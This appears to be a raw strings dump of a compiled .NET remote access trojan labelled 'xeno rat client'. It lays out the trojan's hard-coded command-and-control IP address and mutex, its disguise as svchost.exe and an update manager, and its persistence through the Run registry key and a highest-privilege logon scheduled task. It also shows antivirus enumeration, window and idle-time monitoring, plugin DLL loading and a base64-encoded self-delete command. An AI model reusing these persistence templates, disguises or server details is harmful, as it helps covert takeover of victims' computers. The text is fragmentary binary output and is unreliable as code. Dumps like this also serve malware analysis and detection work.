!This program cannot be run in DOS mode.
`.rsrc
@.reloc
moom825
v4.0.30319
#Strings
<ReceiveAsync>d__10
<Disconnect>d__10
<DebugMenu>d__10
<GetIdleTimeAsync>d__20
<>9__20_0
<GetIdleTimeAsync>b__20_0
<>c__DisplayClass16_0
<>9__6_0
<Concat>b__6_0
<>c__DisplayClass18_0
<>9__8_0
<GetCaptionOfActiveWindowAsync>b__8_0
<AddToStartupNonAdmin>b__0
<RemoveStartup>b__0
<ConnectSubSockAsync>d__11
<Main>d__11
<SendUpdateInfo>d__11
COMPRESSION_FORMAT_LZNT1
<>u__1
Func`1
IEnumerable`1
Task`1
Action`1
AsyncTaskMethodBuilder`1
TaskAwaiter`1
ArraySegment`1
List`1
<>7__wrap1
__StaticArrayInitTypeSize=32
Microsoft.Win32
UInt32
<data>5__2
<tempXmlFile>5__2
<getdll>5__2
<currwin>5__2
<conn>5__2
<comp>5__2
<socket>5__2
<HearbeatReply>5__2
<>u__2
Func`2
Dictionary`2
<>7__wrap2
<ReceiveAsync>d__13
<sub>5__3
<total>5__3
<HearbeatFail>5__3
<hasdll>5__3
<process>5__3
<CreateSubSock>d__3
<DllNodeHandler>d__3
<>u__3
<SendAsync>d__14
1D1CC35EA61331C5A85D2A960611153E37A62DCD916269D6E3B5A0DAC2EF3824
<fail>5__4
<socket>5__4
<dataLeft>5__4
<RecvAllAsync_ddos_unsafer>d__4
Func`4
<>7__wrap4
<ConnectAndSetupAsync>d__15
<e>5__5
<startTimestamp>5__5
<GetAndSendInfo>d__5
<RecvAllAsync_ddos_safer>d__5
<>7__wrap5
<RemoveStartup>d__16
<lastSendTime>5__6
<Type0Receive>d__6
<Uninstall>d__17
__StaticArrayInitTypeSize=7
<dllname>5__7
<Type1Receive>d__7
<AuthenticateAsync>d__18
<AddToStartupNonAdmin>d__18
get_UTF8
<e>5__8
<GetCaptionOfActiveWindowAsync>d__8
<setSetId>d__8
<AddToStartupAdmin>d__19
<SendAsync>d__9
<Type2Receive>d__9
<Module>
<Main>
<PrivateImplementationDetails>
630DCD2966C4336691125448BBB25B4FF412A49C732DB2C8ABC1B8581BD710DD
get_ASCII
COMPRESSION_ENGINE_MAXIMUM
LASTINPUTINFO
System.IO
get_IV
set_IV
mscorlib
System.Collections.Generic
SendAsync
GetIdleTimeAsync
AuthenticateAsync
ReceiveAsync
ConnectSubSockAsync
FromAsync
ConnectAndSetupAsync
ConnectAsync
GetCaptionOfActiveWindowAsync
LocalAlloc
GetWindowThreadProcessId
setSetId
GetProcessById
Thread
Compressed
get_Connected
AwaitUnsafeOnCompleted
get_IsCompleted
ReadToEnd
Append
GetMethod
Replace
get_StackTrace
CreateInstance
CryptoStreamMode
AddSubNode
subNode
MainNode
LocalFree
get_Message
Invoke
get_Available
Enumerable
IDisposable
RuntimeFieldHandle
CloseHandle
Console
set_WindowStyle
ProcessWindowStyle
get_Name
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_UserName
get_ProcessName
AssemblyName
startup_name
GetIdleTime
DateTime
dwTime
AppendLine
WriteLine
get_NewLine
IAsyncStateMachine
SetStateMachine
stateMachine
ValueType
SockType
ProtocolType
GetType
SocketType
ByteArrayCompare
System.Core
MethodBase
Dispose
BTruncate
Create
<>1__state
Delete
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AsyncStateMachineAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
DeleteValue
GetValue
SetValue
GetPropertyValue
RegistryHive
Type0Receive
Type1Receive
Type2Receive
add_AssemblyResolve
CurrentDomain_AssemblyResolve
Remove
xeno rat client.exe
cbSize
FinalUncompressedSize
RtlGetCompressionWorkSpaceSize
OriginalFileSize
get_TotalSize
pDestinationSize
pNeededBufferSize
CompressedBufferSize
UncompressedBufferSize
original_size
Resize
SizeOf
IndexOf
System.Threading
get_Encoding
System.Runtime.Versioning
FromBase64String
ToString
GetString
mutex_string
Substring
ProcessLog
ComputeHash
strToHash
GetHash
executablePath
Install_path
classpath
SourceBufferLength
DestinationBufferLength
GetWindowTextLength
AsyncCallback
CreateSubSock
FlushFinalBlock
get_Task
Marshal
System.Security.Principal
System.ComponentModel
Uninstall
kernel32.dll
shell32.dll
User32.dll
user32.dll
ntdll.dll
msvcrt.dll
CryptoStream
MemoryStream
Program
get_Item
set_Item
OperatingSystem
SymmetricAlgorithm
HashAlgorithm
ICryptoTransform
Boolean
IsLittleEndian
TimeSpan
AppDomain
get_CurrentDomain
IsUserAnAdmin
AddToStartupNonAdmin
AddToStartupAdmin
IsAdmin
get_OSVersion
GetWindowsVersion
Compression
get_Location
Action
op_Subtraction
System.Reflection
ManagementObjectCollection
KeyCollection
add_UnhandledException
CurrentDomain_UnhandledException
ArgumentNullException
SetException
Encryption
Unknown
GetAndSendInfo
MethodInfo
SendUpdateInfo
DriveInfo
get_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
ServerIp
memcmp
RemoveStartup
DoStartup
System.Linq
ParseHeader
StreamReader
TextReader
header
MD5CryptoServiceProvider
AsyncVoidMethodBuilder
AsyncTaskMethodBuilder
StringBuilder
<>t__builder
sender
RecvAllAsync_ddos_safer
RecvAllAsync_ddos_unsafer
CompressedBuffer
UncompressedBuffer
WorkspaceBuffer
SourceBuffer
DestinationBuffer
RtlCompressBuffer
RtlDecompressBuffer
buffer
ManagementObjectSearcher
DllNodeHandler
DllHandler
SocketHandler
ResolveEventHandler
UnhandledExceptionEventHandler
_dllhandler
ToUpper
TaskAwaiter
GetAwaiter
CapturingConsoleWriter
TextWriter
BitConverter
subServer
ManagementObjectEnumerator
GetEnumerator
Activator
.cctor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
get_TotalMilliseconds
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
subNodes
Assemblies
ExpandEnvironmentVariables
GetValueNames
IntToBytes
GetBytes
sizetdwBytes
BindingFlags
SocketFlags
uFlags
ResolveEventArgs
UnhandledExceptionEventArgs
<>4__this
System.Threading.Tasks
System.Security.Claims
Contains
SocketTaskExtensions
StringSplitOptions
RuntimeHelpers
GetCurrentProcess
Compress
Decompress
System.Net.Sockets
set_Arguments
Exists
GetAntivirus
get_Keys
Concat
CompressionFormat
ManagementBaseObject
hObject
get_ExceptionObject
ManagementObject
EndDisconnect
_OnDisconnect
BeginDisconnect
System.Net
Socket
socket
T_offset
WaitForExit
get_Result
IAsyncResult
GetResult
SetResult
BytesToInt
xeno rat client
xeno_rat_client
System.Management
Environment
Component
Parent
get_Current
GetCurrent
get_RemoteEndPoint
get_Count
get_TickCount
get_ProcessorCount
GetPathRoot
Decrypt
Encrypt
Convert
ServerPort
ToList
get_Out
originalOut
SetOut
set_ReceiveTimeout
SetRecvTimeout
ResetRecvTimeout
socktimeout
ClearCapturedOutput
GetCapturedOutput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
WriteAllText
GetWindowText
DebugMenu
RegistryView
get_Now
GetForegroundWindow
GetCaptionOfActiveWindow
set_CreateNoWindow
set_NoDelay
InitializeArray
ToArray
get_Key
set_Key
OpenSubKey
OpenBaseKey
_EncryptionKey
ContainsKey
RegistryKey
System.Security.Cryptography
GetExecutingAssembly
GetEntryAssembly
AddressFamily
SelectMany
BlockCopy
get_Factory
TaskFactory
CreateDirectory
get_SystemDirectory
GetCurrentDirectory
op_Equality
op_Inequality
ClaimsIdentity
WindowsIdentity
WrapNonExceptionThrows
xeno rat client
Copyright
2023
$310fc5be-6f5e-479c-a246-6093a39296c0
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
/xeno_rat_client.DllHandler+<DllNodeHandler>d__3
+xeno_rat_client.Handler+<CreateSubSock>d__3
,xeno_rat_client.Handler+<GetAndSendInfo>d__5
*xeno_rat_client.Handler+<Type0Receive>d__6
*xeno_rat_client.Handler+<Type1Receive>d__7
&xeno_rat_client.Handler+<setSetId>d__8
*xeno_rat_client.Handler+<Type2Receive>d__9
(xeno_rat_client.Handler+<DebugMenu>d__10
-xeno_rat_client.Handler+<SendUpdateInfo>d__11
&xeno_rat_client.Node+<Disconnect>d__10
/xeno_rat_client.Node+<ConnectSubSockAsync>d__11
(xeno_rat_client.Node+<ReceiveAsync>d__13
%xeno_rat_client.Node+<SendAsync>d__14
-xeno_rat_client.Node+<AuthenticateAsync>d__18
=xeno_rat_client.SocketHandler+<RecvAllAsync_ddos_unsafer>d__4
;xeno_rat_client.SocketHandler+<RecvAllAsync_ddos_safer>d__5
-xeno_rat_client.SocketHandler+<SendAsync>d__9
1xeno_rat_client.SocketHandler+<ReceiveAsync>d__10
#xeno_rat_client.Program+<Main>d__11
9xeno_rat_client.Utils+<GetCaptionOfActiveWindowAsync>d__8
1xeno_rat_client.Utils+<ConnectAndSetupAsync>d__15
*xeno_rat_client.Utils+<RemoveStartup>d__16
&xeno_rat_client.Utils+<Uninstall>d__17
1xeno_rat_client.Utils+<AddToStartupNonAdmin>d__18
.xeno_rat_client.Utils+<AddToStartupAdmin>d__19
-xeno_rat_client.Utils+<GetIdleTimeAsync>d__20
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
! " # $ % & ' ( ) * ,+-++
Plugin.Main
xeno rat client
error with subnode, subnode type=
data can not be null!
217.63.234.90
Xeno_rat_nd8912ddd
appdata
svchost.exe
-admin
nothingset
%\XenoManager\
XenoUpdateManager
\root\SecurityCenter2
SELECT * FROM AntivirusProduct
displayName
SELECT * FROM Win32_OperatingSystem
Caption
OSArchitecture
UNKNOWN
schtasks.exe
/query /v /fo csv
TaskName
Task To Run
/delete /tn "
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
<Task xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>
<Triggers>
<LogonTrigger>
<Enabled>true</Enabled>
</LogonTrigger>
</Triggers>
<Principals>
<Principal id='Author'>
<LogonType>InteractiveToken</LogonType>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
</Settings>
<Actions>
<Exec>
<Command>
</Command>
</Exec>
</Actions>
</Task>
/Create /TN "
" /XML "
SUCCESS
L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsICI=
cmd.exe
XenoUpdateManager
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Client
FileVersion
3.2.1.0
InternalName
xeno rat client.exe
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
manager.exe
ProductName
Xeno-manager
ProductVersion
1.2.3.0
Assembly Version
1.2.3.0